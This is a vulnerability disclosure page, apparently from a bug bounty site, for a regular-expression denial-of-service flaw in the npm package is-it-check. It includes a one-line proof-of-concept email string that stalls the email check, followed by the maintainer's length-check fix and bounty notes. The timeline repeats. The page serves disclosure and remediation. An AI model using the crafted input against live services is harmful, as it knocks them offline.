ReDoS in is-it-check in evdama/is-it-check

Valid

Reported on

Mar 19th 2022

✍️ Description

It allows causing a denial of service when checking crafted invalid emails.

🕵️‍♂️ Proof of Concept

// PoC.js
var isItCheck = require("is-it-check")
isItCheck.email('_@A.'+ '0.0.'.repeat(40)+'~A')

We are processing your report and will contact the evdama/is-it-check team within 24 hours. a year ago

We have contacted a member of the evdama/is-it-check team and are waiting to hear back a year ago

Markus

commented a year ago

Maintainer

Same as for the is.url() check... Two possible solutions, a) add a str.length() check or b) modify existing regex with a length check. Would you mind sending a PR to https://github.com/evdama/is-it-check ?

Markus

commented a year ago

Maintainer

I opted for b https://github.com/evdama/is.js/commit/74b01444421525d636dabb47d4e72b23fd58a152

Markus validated this vulnerability a year ago

Yeting Li has been awarded the disclosure bounty

The fix bounty is now up for grabs

Markus marked this as fixed in 1.0.0 with commit 74b014 a year ago

Markus has been awarded the fix bounty

This vulnerability will not receive a CVE

to join this conversation

We are processing your report and will contact the evdama/is-it-check team within 24 hours. a year ago

We have contacted a member of the evdama/is-it-check team and are waiting to hear back a year ago

Markus

commented a year ago

Maintainer

Markus

commented a year ago

Maintainer

I opted for b https://github.com/evdama/is.js/commit/74b01444421525d636dabb47d4e72b23fd58a152

Markus validated this vulnerability a year ago

Yeting Li has been awarded the disclosure bounty

The fix bounty is now up for grabs

Markus marked this as fixed in 1.0.0 with commit 74b014 a year ago

Markus has been awarded the fix bounty

This vulnerability will not receive a CVE

to join this conversation